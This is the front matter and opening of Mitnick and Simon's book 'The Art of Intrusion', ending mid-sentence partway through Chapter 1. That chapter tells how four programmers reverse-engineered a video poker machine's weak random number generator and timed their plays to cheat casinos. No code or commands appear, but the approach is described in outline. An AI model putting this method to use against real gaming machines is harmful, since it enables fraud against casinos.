The Art of Intrusion
    by Kevin D. Mitnick & William L. Simon    

(PDF Version)

THE ART OF
INTRUSION
The Real Stories Behind the Exploits of Hackers, Intruders & Deceivers




                         Kevin D. Mitnick
                         William L. Simon
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Copyright © 2005 by Kevin D. Mitnick and William L. Simon
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Library of Congress Cataloging-in-Publication Data:
Mitnick, Kevin D. (Kevin David), 1963-
  The art of intrusion : the real stories behind the exploits of hackers, intruders, and deceivers / Kevin D.
Mitnick, William L. Simon.
      p. cm.
  Includes index.
  ISBN 0-7645-6959-7 (cloth)
 1. Computer security. 2. Computer hackers. I. Simon, William L., 1930- II. Title.
  QA76.9.A25M587 2005
  005.8--dc22
                                                                             2004025697
     For Shelly Jaffe, Reba Vartanian, Chickie Leventhal,
                        Mitchell Mitnick

                  For Darci and Briannah

        And for the late Alan Mitnick, Adam Mitnick,
                 Sydney Kramer, Jack Biello.




For Arynne, Victoria, Sheldon, and David, and for Vincent and
                             Elena
Contents
Chapter 1         Hacking the Casinos for a Million Bucks                     . . . . . . . . . . . . . . . .1

Chapter 2         When Terrorists Come Calling . . . . . . . . . . . . . . . . . . . . . . .23

Chapter 3         The Texas Prison Hack              . . . . . . . . . . . . . . . . . . . . . . . . . . . .49

Chapter 4         Cops and Robbers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .69

Chapter 5         The Robin Hood Hacker                  . . . . . . . . . . . . . . . . . . . . . . . . . .91

Chapter 6         The Wisdom and Folly of Penetration Testing . . . . . . . . . . .115

Chapter 7         Of Course Your Bank Is Secure — Right? . . . . . . . . . . . . . .139

Chapter 8         Your Intellectual Property Isn’t Safe . . . . . . . . . . . . . . . . . .153

Chapter 9         On the Continent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .195

Chapter 10        Social Engineers — How They Work
                  and How to Stop Them . . . . . . . . . . . . . . . . . . . . . . . . . . .221

Chapter 11        Short Takes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .247

Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .261
               Preface

Hackers play one-up among themselves. Clearly one of the prizes would
be bragging rights from hacking into my security company’s Web site or
my personal system.
   Another would be that they had made up a story of a hack and planted
it on me and my co-author Bill Simon so convincingly that we were taken
in, believed it as true, and included it in this book.
   That has presented a fascinating challenge, a game of wits that the two
of us have played time after time as we did the interviews for the book.
For most reporters and authors, establishing authenticity is a fairly rou-
tine matter: Is this really the person he or she claims to be? Is this person
or was this person really working for the organization he or she claims?
Did this person have the position he or she says? Does this person have
documentation to back up the story, and can I verify that the documents
are valid? Are there reputable people who will support the story or parts
of it?
   With hackers, checking the bona fides is tricky. Most of the people
whose stories appear in this book, other than a few who have already
been to prison, would face felony charges if their true identities could be
determined. So, asking for real names, or expecting to be offered as
proof, is an iffy proposition.
   These people have only come forward with their stories because they
trust me. They know I’ve done time myself, and they are willing to rely
on my not betraying them in a way that could put them in that position.
Yet, despite the risks, many did offer tangible proof of their hacks.
   Even so, it’s possible — in fact, it’s likely — that some people exagger-
ated their stories with details intended to make them more compelling,
or spun a story that was a total fabrication, but constructed around
enough workable exploits to give them the ring of truth.
   Because of that risk, we have been diligent in holding to a high stan-
dard of reliability. Through all the interviews, I have challenged every
technical detail, asking for in-depth explanations of anything that didn’t

                                     ix
  x                         The Art of Intrusion


sound quite right, and sometimes following up later to see if the story
was still the same or if he or she told it differently the second time
around. Or, if this person “couldn’t remember” when asked about some
hard-to-accomplish step omitted from the story. Or, if this person just
didn’t seem to know enough to do what he or she claimed or couldn’t
explain how he or she got from point A to point B.
   Except where specifically noted, every one of the main stories in this
book has passed my “smell test.” My co-author and I agreed on the
believability of every person whose story we have included. Nevertheless,
details have often been changed to protect the hacker and the victim. In
several of the stories, the identities of companies are disguised. I modi-
fied the names, industries, and locations of targeted organizations. In
some cases, there is misleading information to protect the identity of the
victim or to prevent a duplication of the crime. However, the basic vul-
nerabilities and nature of the incidents are accurate.
   At the same time, because software developers and hardware manufac-
turers are continually fixing security vulnerabilities through patches and
new product versions, few of the exploits described in these pages still
work as described here. This might lead the overconfident reader to
decide that he or she need not be concerned, that, with vulnerabilities
attended to and corrected, the reader and his or her company have noth-
ing to be worried about. But the lesson of these stories, whether they
happened six months ago or six years ago, is that hackers are finding new
vulnerabilities every day. Read the book not to learn specific vulnerabili-
ties in specific products, but to change your attitudes and gain a new
resolve.
   And read the book, too, to be entertained, awed, amazed at the con-
tinually surprising exploits of these wickedly clever hackers.
   Some are shocking, some are eye-opening, some will make you laugh
at the inspired nerve of the hacker. If you’re an IT or security profes-
sional, every story has lessons for you on making your organization more
secure. If you’re a non-technical person who enjoys stories of crime, dar-
ing, risk-taking, and just plain guts, you’ll find all that here.
   Every one of these adventures involved the danger of a knock at the
door, where a posse of cops, FBI agents, and Secret Service types would
be waiting with handcuffs ready. And, in a number of the cases, that’s
exactly what happened.
   For the rest, the possibility still remains. No wonder most of these
hackers have never been willing to tell their stories before. Most of these
adventures you will read here are being published for the very first time.
   Acknowledgments


                        By Kevin Mitnick
This book is dedicated to my wonderful family, close friends, and, most
of all, the people that made this book possible — the black-hat and
white-hat hackers who contributed their stories for our education and
entertainment.
  The Art of Intrusion was even more challenging to write than our last
book. Instead of using our combined creative talent to develop stories
and anecdotes to illustrate the dangers of social engineering and what
businesses can do to mitigate it, both Bill Simon and I relied heavily on
interviewing former hackers, phone phreaks, and hackers turned security
professionals. We wanted to write a book that would be both a crime
thriller and an eye-opening guide to helping businesses protect their
valuable information and computing resources. We strongly believe that
by disclosing the common methodologies and techniques used by hack-
ers to break into systems and networks, we can influence the community
at large to adequately address these risks and threats posed by savvy
adversaries.
  I have had the extraordinary fortune of being teamed up with best-
selling author Bill Simon, and we worked diligently together on this new
book. Bill’s notable skills as a writer include his magical ability to take
information provided by our contributors and write it in such a style and
manner that anyone’s grandmother could understand it. More impor-
tantly, Bill has become more than just a business partner in writing, but
a loyal friend who has been there for me during this whole development
process. Although we had some moments of frustration and differences
of opinion during the development phase, we always work it out to our
mutual satisfaction. In a little over two years, I’ll finally be able to write
and publish the The Untold Story of Kevin Mitnick, after certain govern-
ment restrictions expire. Hopefully, Bill and I will collaborate on this
project as well.


                                      xi
 xii                       The Art of Intrusion


   Bill’s wonderful wife, Arynne Simon, also has a warm place in my heart.
I appreciate her love, kindness, and generosity that she has shown me in
the last three years. My only disappointing experience is not being able
to enjoy her great cooking. Now that the book is finally finished, maybe
I can convince her to cook a celebration dinner!
   Having been so focused on The Art of Intrusion, I haven’t been able to
spend much quality time with family and close friends. I became some-
what of a workaholic, similar to the days where I’d spend countless hours
behind the keyboard exploring the dark corners of cyberspace.
   I want to thank my loving girlfriend, Darci Wood, and her game-loving
daughter Briannah for being supportive and patient during this time-
consuming project. Thank you, baby, for all your love, dedication, and
support that you and Briannah have provided me while working on this
and other challenging projects.
   This book would not have been possible without the love and support
of my family. My mother, Shelly Jaffe, and my grandmother, Reba
Vartanian, have given me unconditional love and support throughout my
life. I am so fortunate to have been raised by such a loving and dedicated
mother, who I also consider my best friend. My grandmother has been
like a second mom to me, providing me with the same nurturing and love
that usually only a mother can give. She has been extremely helpful in
handling some of my business affairs, which at times interfered with her
schedule. In every instance, she made my business a top priority, even
when it was inconvenient to do so. Thank you, Gram, for helping me get
the job done whenever I needed you. As caring and compassionate peo-
ple, they’ve taught me the principles of caring about others and lending
a helping hand to the less fortunate. And so, by imitating the pattern of
giving and caring, I, in a sense, follow the paths of their lives. I hope
they’ll forgive me for putting them on the back burner during the process
of writing this book, passing up chances to see them with the excuse of
work and deadlines to meet. This book would not have been possible
without their continued love and support that I’ll forever hold close to
my heart.
   How I wish my Dad, Alan Mitnick, and my brother, Adam Mitnick,
would have lived long enough to break open a bottle of champagne with
me on the day our second book first appears in a bookstore. As a sales-
man and business owner, my father taught me many of the finer things
that I will never forget.
   My mother’s late boyfriend, Steven Knittle, has been a father figure to
me for the past 12 years. I took great comfort knowing that you were
always there to take care of my mom when I could not. Your passing has
                             Acknowledgments                           xiii

had a profound impact on our family and we miss your humor, laughter,
and the love you brought to our family. RIP.
   My aunt Chickie Leventhal will always have a special place in my heart.
Over the last couple years, our family ties have been strengthened, and
our communication has been wonderful. Whenever I need advice or a
place to stay, she is always there offering her love and support. During my
intense devotion to writing this book, I sacrificed many opportunities to
join her, my cousin, Mitch Leventhal, and her boyfriend, Dr. Robert
Berkowitz, for our family get-togethers.
   My friend Jack Biello was a loving and caring person who spoke out
against the extraordinary mistreatment I endured at the hands of jour-
nalists and government prosecutors. He was a key voice in the Free Kevin
movement and a writer who had an extraordinary talent for writing com-
pelling articles exposing the information that the government didn’t
want you to know. Jack was always there to fearlessly speak out on my
behalf and to work together with me preparing speeches and articles,
and, at one point, represented me as a media liaison. While finishing up
the manuscript for The Art of Deception (Wiley Publishing, Inc., 2002),
Jack’s passing left me feeling a great sense of loss and sadness. Although
it’s been two years, Jack is always in my thoughts.
   One of my closest friends, Caroline Bergeron, has been very support-
ive of my endeavor to succeed on this book project. She is a lovely and
brilliant soon-to-be lawyer living in the Great White North. Having met
her during one of my speaking engagements in Victoria, we hit it off
right away. She lent her expertise to proofreading, editing, and correct-
ing the two-day social engineering seminar that Alex Kasper and I devel-
oped. Thank you, Caroline, for being there for me.
   My colleague Alex Kasper is not only my best friend but also my col-
league; we are currently working on delivering one-day and two-day sem-
inars on how businesses can recognize and defend against social
engineering attacks. Together we hosted a popular Internet talk radio
show known as “The Darkside of the Internet” on KFI radio in Los
Angeles. You have been a great friend and confidant. Thank you for your
invaluable assistance and advice. Your influence has always been positive
and helpful with a kindness and generosity that often extended far
beyond the norm.
   Paul Dryman has been a family friend for many, many years. Paul was
my late father’s best friend. After my dad’s passing, Paul has been a father
figure, always willing to help and talk with me about anything on my
mind. Thank you, Paul, for your loyal and devoted friendship to my
father and I for so many years.
 xiv                        The Art of Intrusion


   Amy Gray has managed my speaking career for the last three years. Not
only do I admire and adore her personality, but I value how she treats
other people with such respect and courtesy. Your support and dedication
to professionalism has contributed to my success as a public speaker and
trainer. Thank you so much for your continued friendship and your
commitment to excellence.
   Attorney Gregory Vinson was on my defense team during my years-
long battle with the government. I’m sure he can relate to Bill’s under-
standing and patience for my perfectionism; he has had the same
experience working with me on legal briefs he has written on my behalf.
Gregory is now my business attorney diligently working with me on new
contracts and negotiating business deals. Thank you for your wonderful
support and diligent work, especially when needed on short notice.
   Evil Corley (aka Emmanuel Goldstein) has been an active supporter
and close friend for over a decade. He has always looked out for my best
interest and has publicly defended me when I was demonized by
Miramax Films and certain other journalists. Evilc has been extremely
instrumental in getting the word out during the government’s prosecu-
tion of me. Your kindness, generosity, and friendship mean more to me
than words can express. Thank you for being a loyal and trusted friend.
   Steve Wozniak and Sharon Akers have given much of their time to assist
me and are always there to help me out. The frequent rearranging of your
schedules to be there to support me is much appreciated and it warms me
to call both of you my friends. Hopefully, now that this book is com-
pleted, we will have more time to get together for some gadget quality
time. Steve — I’ll never forget the time that you, Jeff Samuels, and I
drove through the night in your Hummer to get to DEFCON in Las
Vegas, switching drivers constantly so that we could all check our e-mail
and chat with friends over our GPRS wireless connections.
   And as I write these acknowledgments, I realize I have so many people
to thank and to express appreciation to for offering their love, friendship,
and support. I cannot begin to remember the names of all the kind and
generous people that I’ve met in recent years, but suffice to say, I would
need a large USB flash drive to store them all. There have been so many
people from all over the world who have written me words of encour-
agement, praise, and support. These words have meant a great deal to
me, especially during the times I needed it most.
   I’m especially thankful to all my supporters who stood by me and spent
their valuable time and energy getting the word out to anyone that would
listen, voicing their concern and objection over my unfair treatment and
                            Acknowledgments                          xv

the hyperbole created by those who sought to profit from the “The Myth
of Kevin Mitnick.”
  I’m eager to thank those people who represent my professional career
and are dedicated in extraordinary ways. David Fugate, of Waterside
Productions, is my book agent who went to bat for me on many occa-
sions before and after the book contract was signed.
  I very much appreciate the opportunity that John Wiley & Sons has
given me to author another book, and for their confidence in our ability
to develop a best seller. I wish to thank the following Wiley people who
made this dream possible: Ellen Gerstein; Bob Ipsen; Carol Long, who
always promptly responds to my questions and concerns (my number one
contact at Wiley and executive editor); and Emilie Herman and Kevin
Shafer (developmental editors), who have both worked with us as a team
to get the job done.
  I have had too many experiences with lawyers, but I am eager to have
a place to express my thanks for the lawyers who, during the years of my
negative interactions with the criminal justice system, stepped up and
offered to help me when I was in desperate need. From kind words to
deep involvement with my case, I met many who don’t at all fit the
stereotype of the self-centered attorney. I have come to respect, admire,
and appreciate the kindness and generosity of spirit given to me so freely
by so many. They each deserve to be acknowledged with a paragraph of
favorable words; I will at least mention them all by name, for every one
of them lives in my heart surrounded by appreciation: Greg Aclin, Fran
Campbell, Lauren Colby, John Dusenbury, Sherman Ellison, Omar
Figueroa, Jim French, Carolyn Hagin, Rob Hale, David Mahler, Ralph
Peretz, Alvin Michaelson, Donald C. Randolph, Alan Rubin, Tony Serra,
Skip Slates, Richard Steingard, Honorable Robert Talcott, Barry Tarlow,
John Yzurdiaga, and Gregory Vinson.
  Other family members, personal friends, business associates who have
given me advice and support, and have reached out in many ways, are
important to recognize and acknowledge. They are JJ Abrams, Sharon
Akers, Matt “NullLink” Beckman, Alex “CriticalMass” Berta, Jack
Biello, Serge and Susanne Birbrair, Paul Block, Jeff Bowler, Matt “404”
Burke, Mark Burnett, Thomas Cannon, GraceAnn and Perry Chavez,
Raoul Chiesa, Dale Coddington, Marcus Colombano, Avi Corfas,
Ed Cummings, Jason “Cypher” Satterfield, Robert Davies, Dave
Delancey, Reverend Digital, Oyvind Dossland, Sam Downing, John
Draper, Ralph Echemendia, Ori Eisen, Roy Eskapa, Alex Fielding, Erin
Finn, Gary Fish and Fishnet Security, Lisa Flores, Brock Frank, Gregor
Freund, Sean Gailey and the whole Jinx crew, Michael and Katie Gardner,
 xvi                        The Art of Intrusion


Steve Gibson, Rop Gonggrijp, Jerry Greenblatt, Thomas Greene, Greg
Grunberg, Dave Harrison, G. Mark Hardy, Larry Hawley, Leslie
Herman, Michael Hess and everyone at Roadwired bags, Jim Hill, Ken
Holder, Rochell Hornbuckle, Andrew “Bunnie” Huang, Linda Hull,
Steve Hunt, all the great people at IDC, Marco Ivaldi, Virgil Kasper,
Stacey Kirkland, Erik Jan Koedijk, the Lamo Family, Leo and Jennifer
Laporte, Pat Lawson, Candi Layman, Arnaud Le-hung, Karen Leventhal,
Bob Levy, David and Mark Litchfield, CJ Little, Jonathan Littman, Mark
Loveless, Lucky 225, Mark Maifrett, Lee Malis, Andy Marton, Lapo
Masiero, Forrest McDonald, Kerry McElwee, Jim “GonZo” McAnally,
Paul and Vicki Miller, Elliott Moore, Michael Morris, Vincent, Paul and
Eileen Navarino, Patrick and Sarah Norton, John Nunes, Shawn Nunley,
Janis Orsino, Tom Parker, Marco Plas, Kevin and Lauren Poulsen, Scott
Press, Linda and Art Pryor, Pyr0, John Rafuse, Mike Roadancer and the
entire security crew from HOPE 2004, RGB, Israel and Rachel
Rosencrantz, Mark Ross, Bill Royle, William Royer, Joel “ch0l0man”
Ruiz, Martyn Ruks, Ryan Russell, Brad Sagarin, Martin Sargent, Loriann
Siminas, Te Smith, Dan Sokol, Trudy Spector, Matt Spergel, Gregory
Spievack, Jim and Olivia Sumner, Douglas Thomas, Cathy Von, Ron
Wetzel, Andrew Williams, Willem, Don David Wilson, Joey Wilson, Dave
and Dianna Wykofka, and all my friends and supporters from the boards
on Labmistress.com and 2600 magazine.

                           By Bill Simon
In doing our first book, The Art of Deception, Kevin Mitnick and I forged
a friendship. While writing this one, we continually found new ways of
working together while deepening our friendship. So, my first words of
appreciation go to Kevin for being an outstanding “travel companion” as
we shared this second journey.
   David Fugate, my agent at Waterside Productions and the man respon-
sible for bringing Kevin and me together in the first place, tapped into his
usual store of patience and wisdom to find ways of solving those few mis-
erable situations that cropped up. When the going gets tough, every
writer should be blessed with an agent who is as wise and as good a
friend. Ditto for my longtime friend Bill Gladstone, the founder of
Waterside Productions and my principal agent. Bill remains a key factor
in the success of my writing career and has my everlasting gratitude.
   My wife Arynne continues to inspire me anew each day with her love
and her dedication to excellence; I appreciate her more than I can say in
words. She has increased my proficiency as a writer because of her intel-
ligence and willingness to be forthright by telling me straight out when
                            Acknowledgments                          xvii

my writing has missed the mark. Somehow she gets through the steam of
wrath that is my usual initial response to her suggestions, but in the end
I accept the wisdom of her suggestions and do the rewrite.
  Mark Wilson lent a helping hand that made a difference. Emilie
Herman was a champion of an editor. And I can’t overlook the work of
Kevin Shafer, who took over after Emilie left.
  Even a sixteenth book accumulates a debt to people who along the way
have been more than a little helpful; of the many, I especially want to
mention Kimberly Valentini and Maureen Maloney of Waterside, and
Josephine Rodriguez. Marianne Stuber did her usual fast turnaround
transcribing (not easy with all those strange technical terms and hacker
slang) and Jessica Dudgeon kept the office on an even keel. Darci Wood
was a champ about the time her Kevin dedicated to getting this book
done.
  Special thanks to daughter Victoria and son Sheldon for their under-
standing, and to my twin grandchildren Vincent and Elena, all of whom
I trust I will be able to see more once this manuscript is delivered.
  To the many who offered us stories, and especially to those whose com-
pelling stories we chose to use, Kevin and I are deeply indebted. They
came forward despite significant risks. Had their names been revealed, in
many cases they would have faced being dragged away by the men in
blue. Even those whose stories weren’t used showed courage in their will-
ingness to share, and deserve to be admired for it. We do, indeed, admire
them.
             Chapter 1
              Hacking the Casinos
              for a Million Bucks
Every time [some software engineer] says, “Nobody will go to the trouble of
doing that,” there’s some kid in Finland who will go to the trouble.
                                                          — Alex Mayfield




T
           here comes a magical gambler’s moment when simple thrills
           magnify to become 3-D fantasies — a moment when greed
           chews up ethics and the casino system is just another mountain
waiting to be conquered. In that single moment the idea of a foolproof
way to beat the tables or the machines not only kicks in but kicks one’s
breath away.
   Alex Mayfield and three of his friends did more than daydream. Like
many other hacks, this one started as an intellectual exercise just to see if
it looked possible. In the end, the four actually beat the system, taking
the casinos for “about a million dollars,” Alex says.
   In the early 1990s, the four were working as consultants in high-tech
and playing life loose and casual. “You know — you’d work, make some
money, and then not work until you were broke.”
   Las Vegas was far away, a setting for movies and television shows. So
when a technology firm offered the guys an assignment to develop some
software and then accompany it to a trade show at a high-tech conven-
tion there, they jumped at the opportunity. It would be the first in Vegas
for each of them, a chance to see the flashing lights for themselves, all
expenses paid; who would turn that down? The separate suites for each
in a major hotel meant that Alex’s wife and Mike’s girlfriend could be

                                       1
  2                          The Art of Intrusion


included in the fun. The two couples, plus Larry and Marco, set off for
hot times in Sin City.
  Alex says they didn’t know much about gambling and didn’t know
what to expect. “You get off the plane and you see all the old ladies play-
ing the slots. It seems funny and ironic, and you soak that in.”
  After the four had finished doing the trade show, they and the two
ladies were sitting around in the casino of their hotel playing slot
machines and enjoying free beers when Alex’s wife offered a challenge:

      “Aren’t these machines based on computers? You guys are into
      computers, can’t you do something so we win more?”

  The guys adjourned to Mike’s suite and sat around tossing out ques-
tions and offering up theories on how the machines might work.


Research
That was the trigger. The four “got kinda curious about all that, and we
started looking into it when we got back home,” Alex says, warming up
to the vivid memories of that creative phase. It took only a little while for
the research to support what they already suspected. “Yeah, they’re com-
puter programs basically. So then we were interested in, was there some
way that you could crack these machines?”
   There were people who had beaten the slot machines by “replacing the
firmware” — getting to the computer chip inside a machine and substi-
tuting the programming for a version that would provide much more
attractive payoffs than the casino intended. Other teams had done that,
but it seemed to require conspiring with a casino employee, and not just
any employee but one of the slot machine techies. To Alex and his bud-
dies, “swapping ROMs would have been like hitting an old lady over the
head and taking her purse.” They figured if they were going to try this,
it would be as a challenge to their programming skills and their intellects.
And besides, they had no advanced talents in social engineering; they
were computer guys, lacking any knowledge of how you sidle up to a
casino employee and propose that he join you in a little scheme to take
some money that doesn’t belong to you.
   But how would they begin to tackle the problem? Alex explained:

      We were wondering if we could actually predict something about
      the sequence of the cards. Or maybe we could find a back door
      [software code allowing later unauthorized access to the program]
      that some programmer may have put in for his own benefit. All
      programs are written by programmers, and programmers are
             Chapter 1   Hacking the Casinos for a Million Bucks           3

     mischievous creatures. We thought that somehow we might stumble
     on a back door, such as pressing some sequence of buttons to change
     the odds, or a simple programming flaw that we could exploit.

  Alex read the book The Eudaemonic Pie by Thomas Bass (Penguin,
1992), the story of how a band of computer guys and physicists in the
1980s beat roulette in Las Vegas using their own invention of a “wear-
able” computer about the size of a pack of cigarettes to predict the out-
come of a roulette play. One team member at the table would click
buttons to input the speed of the roulette wheel and how the ball was
spinning, and the computer would then feed tones by radio to a hearing
aid in the ear of another team member, who would interpret the signals
and place an appropriate bet. They should have walked away with a ton
of money but didn’t. In Alex’s view, “Their scheme clearly had great
potential, but it was plagued by cumbersome and unreliable technology.
Also, there were many participants, so behavior and interpersonal rela-
tions were an issue. We were determined not to repeat their mistakes.”
  Alex figured it should be easier to beat a computer-based game
“because the computer is completely deterministic” — the outcome
based on by what has gone before, or, to paraphrase an old software engi-
neer’s expression, good data in, good data out. (The original expression
looks at this from the negative perspective: “garbage in, garbage out.”)
  This looked right up his alley. As a youngster, Alex had been a musi-
cian, joining a cult band and dreaming of being a rock star, and when that
didn’t work out had drifted into the study of mathematics. He had a tal-
ent for math, and though he had never cared much for schooling (and
had dropped out of college), he had pursued the subject enough to have
a fairly solid level of competence.
  Deciding that some research was called for, he traveled to Washington,
DC, to spend some time in the reading room of the Patent Office. “I fig-
ured somebody might have been stupid enough to put all the code in the
patent” for a video poker machine. And sure enough, he was right. “At
that time, dumping a ream of object code into a patent was a way for a
patent filer to protect his invention, since the code certainly contains a
very complete description of his invention, but in a form that isn’t terri-
bly user-friendly. I got some microfilm with the object code in it and then
scanned the pages of hex digits for interesting sections, which had to be
disassembled into [a usable form].”
  Analyzing the code uncovered a few secrets that the team found
intriguing, but they concluded that the only way to make any real
progress would be to get their hands on the specific type of machine they
wanted to hack so they could look at the code for themselves.
  4                          The Art of Intrusion


   As a team, the guys were well matched. Mike was a better-than-
competent programmer, stronger than the other three on hardware
design. Marco, another sharp programmer, was an Eastern European
immigrant who looked like a teenager. But he was something of a dare-
devil, approaching everything with a can-do, smart-ass attitude. Alex
excelled at programming and was the one who contributed the knowl-
edge of cryptography they would need. Larry wasn’t much of a pro-
grammer and because of a motorcycle accident couldn’t travel much, but
was a great organizer who kept the project on track and everybody
focused on what needed to be done at each stage.
   After their initial research, Alex “sort of forgot about” the project.
Marco, though, was hot for the idea. He kept insisting, “It’s not that big
a deal, there’s thirteen states where you can legally buy machines.”
Finally he talked the others into giving it a try. “We figured, what the
hell.” Each chipped in enough money to bankroll the travel and the cost
of a machine. They headed once again for Vegas — this time at their own
expense and with another goal in mind.
   Alex says, “To buy a slot machine, basically you just had to go in and show
ID from a state where these machines are legal to own. With a driver’s
license from a legal state, they pretty much didn’t ask a lot of questions.”
One of the guys had a convenient connection to a Nevada resident. “He was
like somebody’s girlfriend’s uncle or something, and he lived in Vegas.”
   They chose Mike as the one to talk to this man because “he has a sales-y
kind of manner, a very presentable sort of guy. The assumption is that you’re
going to use it for illegal gambling. It’s like guns,” Alex explained. A lot of
the machines get gray-marketed — sold outside accepted channels — to
places like social clubs. Still, he found it surprising that “we could buy the
exact same production units that they use on the casino floor.”
   Mike paid the man 1,500 bucks for a machine, a Japanese brand.
“Then two of us put this damn thing in a car. We drove it home as if we
had a baby in the back seat.”


Developing the Hack
Mike, Alex, and Marco lugged the machine upstairs to the second floor
of a house where they had been offered the use of a spare bedroom. The
thrill of the experience would long be remembered by Alex as one of the
most exciting in his life.

      We open it up, we take out the ROM, we figure out what proces-
      sor it is. I had made a decision to get this Japanese machine that
      looked like a knockoff of one of the big brands. I just figured the
              Chapter 1   Hacking the Casinos for a Million Bucks       5

     engineers might have been working under more pressure, they
     might have been a little lazy or a little sloppy.
     It turned out I was right. They had used a 6809 [chip], similar
     to a 6502 that you saw in an Apple II or an Atari. It was an
     8-bit chip with a 64K memory space. I was an assembly language
     programmer, so this was familiar.

  The machine Alex had chosen was one that had been around for some
10 years. Whenever a casino wants to buy a machine of a new design, the
Las Vegas Gaming Commission has to study the programming and make
sure it’s designed so the payouts will be fair to the players. Getting a new
design approved can be a lengthy process, so casinos tend to hold on to
the older machines longer than you would expect. For the team, an older
machine seemed likely to have outdated technology, which they hoped
might be less sophisticated and easier to attack.
  The computer code they downloaded from the chip was in binary
form, the string of 1’s and 0’s that is the most basic level of computer
instructions. To translate that into a form they could work with, they
would first have to do some reverse engineering — a process an engineer
or programmer uses to figure out how an existing product is designed; in
this case it meant converting from machine language to a form that the
guys could understand and work with.
  Alex needed a disassembler to translate the code. The foursome didn’t
want to tip their hand by trying to purchase the software — an act they
felt would be equivalent to going into your local library and trying to
check out books on how to build a bomb. The guys wrote their own dis-
assembler, an effort that Alex describes as “not a piece of cake, but it was
fun and relatively easy.”
  Once the code from the video poker machine had been run through
the new disassembler, the three programmers sat down to pour over it.
Ordinarily it’s easy for an accomplished software engineer to quickly
locate the sections of a program he or she wants to focus on. That’s
because a person writing code originally puts road signs all through it —
notes, comments, and remarks explaining the function of each section,
something like the way a book may have part titles, chapter titles, and
subheadings for sections within a chapter.
  When a program is compiled into the form that the machine can read,
these road signs are ignored — the computer or microprocessor has no
need for them. So code that has been reverse-engineered lacks any of
these useful explanations; to keep with the “road signs” metaphor, this
recovered code is like a roadmap with no place names, no markings of
highways or streets.
  6                            The Art of Intrusion


  They sifted through the pages of code on-screen looking for clues to
the basic questions: “What’s the logic? How are the cards shuffled? How
are replacement cards picked?” But the main focus for the guys at this
juncture was to locate the code for the random number generator
(RNG). Alex’s guess that the Japanese programmers who wrote the code
for the machine might have taken shortcuts that left errors in the design
of the random number generator turned out to be correct; they had.


Rewriting the Code
Alex sounds proud in describing this effort. “We were programmers; we
were good at what we did. We figured out how numbers in the code turn
into cards on the machine and then wrote a piece of C code that would
do the same thing,” he said, referring to the programming language
called “C.”

      We were motivated and we did a lot of work around the clock. I’d
      say it probably took about two or three weeks to get to the point
      where we really had a good grasp of exactly what was going on in
      the code.
      You look at it, you make some guesses, you write some new code,
      burn it onto the ROM [the computer chip], put it back in the
      machine, and see what happens. We would do things like write
      routines that would pop hex [hexadecimal] numbers on the screen
      on top of the cards. So basically get a sort of a design overview of
      how the code deals the cards.
      It was a combination of trial and error and top-down analysis;
      the code pretty quickly started to make sense. So we understood
      everything about exactly how the numbers inside the computer
      turn into cards on the screen.
      Our hope was that the random number generator would be rela-
      tively simple. And in this case in the early 90’s, it was. I did a lit-
      tle research and found out it was based on something that
      Donald Knuth had written about in the 60’s. These guys didn’t
      invent any of this stuff; they just took existing research on Monte
      Carlo methods and things, and put it into their code.
      We figured out exactly what algorithm they were using to gener-
      ate the cards; it’s called a linear feedback shift register, and it was
      a fairly good random number generator.

  But they soon discovered the random number generator had a fatal flaw
that made their task much easier. Mike explained that “it was a relatively
              Chapter 1    Hacking the Casinos for a Million Bucks               7

simple 32-bit RNG, so the computational complexity of cracking it was
within reach, and with a few good optimizations became almost trivial.”
  So the numbers produced were not truly random. But Alex thinks
there’s a good reason why this has to be so:

     If it’s truly random, they can’t set the odds. They can’t verify
     what the odds really are. Some machines gave sequential royal
     flushes. They shouldn’t happen at all. So the designers want to be
     able to verify that they have the right statistics or they feel like they
     don’t have control over the game.
     Another thing the designers didn’t realize when they designed this
     machine is that basically it’s not just that they need a random
     number generator. Statistically there’s ten cards in each deal —
     the five that show initially, and one alternate card for each of
     those five that will appear if the player chooses to discard. It turns
     out in these early versions of the machine, they basically took those
     ten cards from ten sequential random numbers in the random
     number generator.

   So Alex and his partners understood that the programming instructions
on this earlier-generation machine were poorly thought out. And because
of these mistakes, they saw that they could write a relatively simple but
elegantly clever algorithm to defeat the machine.
   The trick, Alex saw, would be to start a play, see what cards showed up
on the machine, and feed data into their own computer back at home
identifying those cards. Their algorithm would calculate where the ran-
dom generator was, and how many numbers it had to go through before
it would be ready to display the sought-after hand, the royal flush.

     So we’re at our test machine and we run our little program and
     it correctly tells us the upcoming sequence of cards. We were pretty
     excited.

  Alex attributes that excitement to “knowing you’re smarter than some-
body and you can beat them. And that, in our case, it was gonna make
us some money.”
  They went shopping and found a Casio wristwatch with a countdown
feature that could be set to tenths of a second; they bought three, one
for each of the guys who would be going to the casinos; Larry would be
staying behind to man the computer.
  They were ready to start testing their method. One of the team would
begin to play and would call out the hand he got — the denomination
and suit of each of the five cards. Larry would enter the data into their
  8                         The Art of Intrusion


own computer; though something of an off-brand, it was a type popular
with nerds and computer buffs, and great for the purpose because it had
a much faster chip than the one in the Japanese video poker machine. It
took only moments to calculate the exact time to set into one of the
Casio countdown timers.
  When the timer went off, the guy at the slot machine would hit the
Play button. But this had to be done accurately to within a fraction of a
second. Not as much of a problem as it might seem, as Alex explained:

      Two of us had spent some time as musicians. If you’re a musician
      and you have a reasonable sense of rhythm, you can hit a button
      within plus or minus five milliseconds.

  If everything worked the way it was supposed to, the machine would
display the sought-after royal flush. They tried it on their own machine,
practicing until all of them could hit the royal flush on a decent percent-
age of their tries.
  Over the previous months, they had, in Mike’s words, “reverse engi-
neering the operation of the machine, learned precisely how the random
numbers were turned into cards on the screen, precisely when and how
fast the RNG iterated, all of the relevant idiosyncrasies of the machine,
and developed a program to take all of these variables into consideration
so that once we know the state of a particular machine at an exact instant
in time, we could predict with high accuracy the exact iteration of the
RNG at any time within the next few hours or even days.”
  They had defeated the machine — turned it into their slave. They had
taken on a hacker’s intellectual challenge and had succeeded. The knowl-
edge could make them rich.
  It was fun to daydream about. Could they really bring it off in the jun-
gle of a casino?


Back to the Casinos — This Time to Play
It’s one thing to fiddle around on your own machine in a private, safe
location. Trying to sit in the middle of a bustling casino and steal their
money — that’s another story altogether. That takes nerves of steel.
  Their ladies thought the trip was a lark. The guys encouraged tight
skirts and flamboyant behavior — gambling, chatting, giggling, ordering
drinks — hoping the staff in the security booth manning the “Eye in the
